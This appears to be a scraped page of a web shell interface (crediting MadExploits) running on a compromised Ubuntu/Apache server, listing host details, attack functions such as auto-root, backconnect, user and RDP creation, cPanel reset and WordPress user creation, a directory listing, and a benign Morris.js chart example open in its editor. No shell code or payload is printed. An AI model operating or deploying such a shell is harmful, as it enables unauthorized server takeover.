Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
admins /
vendor /
morris /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-x--x
_template.html
726
B
-rwxr-x--x
area-as-line.html
1.03
KB
-rwxr-x--x
area.html
1.11
KB
-rwxr-x--x
bar-colors.html
1.27
KB
-rwxr-x--x
bar-no-axes.html
1.01
KB
-rwxr-x--x
bar.html
1.05
KB
-rwxr-x--x
days.html
1.55
KB
-rwxr-x--x
decimal-custom-hover.html
1.2
KB
-rwxr-x--x
diagonal-xlabels-bar.html
1.59
KB
-rwxr-x--x
diagonal-xlabels.html
1.58
KB
-rwxr-x--x
donut-colors.html
1.13
KB
-rwxr-x--x
donut-formatter.html
1.07
KB
-rwxr-x--x
donut.html
1
KB
-rwxr-x--x
dst.html
1.04
KB
-rwxr-x--x
events.html
2.51
KB
-rwxr-x--x
goals.html
1.01
KB
-rwxr-x--x
months-no-smooth.html
1.55
KB
-rwxr-x--x
negative.html
1.19
KB
-rwxr-x--x
no-grid.html
1.57
KB
-rwxr-x--x
non-continuous.html
1.78
KB
-rwxr-x--x
non-date.html
1.22
KB
-rwxr-x--x
quarters.html
2.52
KB
-rwxr-x--x
resize.html
1.65
KB
-rwxr-x--x
stacked_bars.html
1.02
KB
-rwxr-x--x
timestamps.html
1.62
KB
-rwxr-x--x
updating.html
1.38
KB
-rwxr-x--x
weeks.html
2.47
KB
-rwxr-x--x
years.html
1.49
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : weeks.html
<!doctype html> <head> <script src="http://cdnjs.cloudflare.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/raphael/2.1.2/raphael-min.js"></script> <script src="../morris.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/prettify/r224/prettify.min.js"></script> <script src="lib/example.js"></script> <link rel="stylesheet" href="lib/example.css"> <link rel="stylesheet" href="http://cdnjs.cloudflare.com/ajax/libs/prettify/r224/prettify.min.css"> <link rel="stylesheet" href="../morris.css"> </head> <body> <h1>Formatting Dates With Weeks</h1> <div id="graph"></div> <pre id="code" class="prettyprint linenums"> var week_data = [ {"period": "2011 W27", "licensed": 3407, "sorned": 660}, {"period": "2011 W26", "licensed": 3351, "sorned": 629}, {"period": "2011 W25", "licensed": 3269, "sorned": 618}, {"period": "2011 W24", "licensed": 3246, "sorned": 661}, {"period": "2011 W23", "licensed": 3257, "sorned": 667}, {"period": "2011 W22", "licensed": 3248, "sorned": 627}, {"period": "2011 W21", "licensed": 3171, "sorned": 660}, {"period": "2011 W20", "licensed": 3171, "sorned": 676}, {"period": "2011 W19", "licensed": 3201, "sorned": 656}, {"period": "2011 W18", "licensed": 3215, "sorned": 622}, {"period": "2011 W17", "licensed": 3148, "sorned": 632}, {"period": "2011 W16", "licensed": 3155, "sorned": 681}, {"period": "2011 W15", "licensed": 3190, "sorned": 667}, {"period": "2011 W14", "licensed": 3226, "sorned": 620}, {"period": "2011 W13", "licensed": 3245, "sorned": null}, {"period": "2011 W12", "licensed": 3289, "sorned": null}, {"period": "2011 W11", "licensed": 3263, "sorned": null}, {"period": "2011 W10", "licensed": 3189, "sorned": null}, {"period": "2011 W09", "licensed": 3079, "sorned": null}, {"period": "2011 W08", "licensed": 3085, "sorned": null}, {"period": "2011 W07", "licensed": 3055, "sorned": null}, {"period": "2011 W06", "licensed": 3063, "sorned": null}, {"period": "2011 W05", "licensed": 2943, "sorned": null}, {"period": "2011 W04", "licensed": 2806, "sorned": null}, {"period": "2011 W03", "licensed": 2674, "sorned": null}, {"period": "2011 W02", "licensed": 1702, "sorned": null}, {"period": "2011 W01", "licensed": 1732, "sorned": null} ]; Morris.Line({ element: 'graph', data: week_data, xkey: 'period', ykeys: ['licensed', 'sorned'], labels: ['Licensed', 'SORN'] }); </pre> </body>
Close